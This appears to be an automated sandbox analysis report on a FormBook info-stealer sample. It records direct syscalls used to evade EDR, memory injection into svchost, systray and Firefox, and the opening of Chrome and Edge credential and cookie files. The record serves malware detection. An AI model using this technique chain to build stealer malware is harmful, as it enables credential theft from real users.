Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]	2_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0345E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_034FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]	2_2_03430887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]	2_2_034BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4F42 mov eax, dword ptr fs:[00000030h]	2_2_034D4F42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_004238DA

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,	0_2_0041F250
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041A208
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtOpenKeyEx: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtQueryValueKey: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\systray.exe

Thread register set: target process: 3396

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\systray.exe

Thread APC queued: target process: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 997008

Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00436CD7 LogonUserW,

0_2_00436CD7

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

0_2_0040D590

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00434418

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_0043333C

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZmK1CAc4VP.exe"	Jump to behavior
Source: C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\n4776Jcum1G.exe	Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00446124

Source: ZmK1CAc4VP.exe, n4776Jcum1G.exe, 00000003.00000000.1609773182.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009868785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4010041921.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: n4776Jcum1G.exe, 00000003.00000000.1609773182.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009868785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4010041921.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: n4776Jcum1G.exe, 00000003.00000000.1609773182.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009868785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4010041921.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: n4776Jcum1G.exe, 00000003.00000000.1609773182.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009868785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4010041921.0000000001201000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: ZmK1CAc4VP.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00426BD3 cpuid

2_2_00426BD3

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,

0_2_004720DB

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00472C3F GetUserNameW,

0_2_00472C3F

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0041E364

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1686918719.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4009083957.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4010478338.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687746502.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1688926331.00000000063F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4013593379.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4008861086.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4010273460.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
